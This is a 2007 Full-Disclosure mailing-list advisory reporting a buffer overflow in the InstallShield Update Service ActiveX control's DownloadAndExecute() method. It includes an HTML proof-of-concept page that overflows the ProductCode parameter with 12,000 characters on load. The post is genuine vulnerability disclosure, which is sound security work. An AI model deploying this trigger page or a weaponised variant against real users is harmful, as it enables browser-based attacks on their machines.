[Full-disclosure] Installshield Update Service isusweb.dll Buffer Overflow
Elazar Broad
elazarb at earthlink.net
Mon Dec 24 04:45:21 GMT 2007
The InstallShield Update Service Web Agent version 5.1.100.47363 suffers from an
exploitable buffer overflow in the ProductCode parameter of the DownloadAndExecute()
function. This object is marked safe for scripting. Note that this issue appears to different
from http://www.securityfocus.com/bid/26280(the iDefense advisory seems to be talking about insecure methods), however, the patch referenced in that
issue fixes this issue as well since the update renders this object unsafe for scripting.
PoC as follows:
-----------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = 'A';
while (s.length <= 12000) s = s + 'A';
obj.Initialize("", "", "", "");
obj.DownloadAndExecute("", s, 0, "", "");
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E9880553-B8A7-4960-A668-95C68BED571E"
/>
</object>
</body>
</html>
-----------------------
Elazar
Full-Disclosure is hosted and sponsored by Secunia.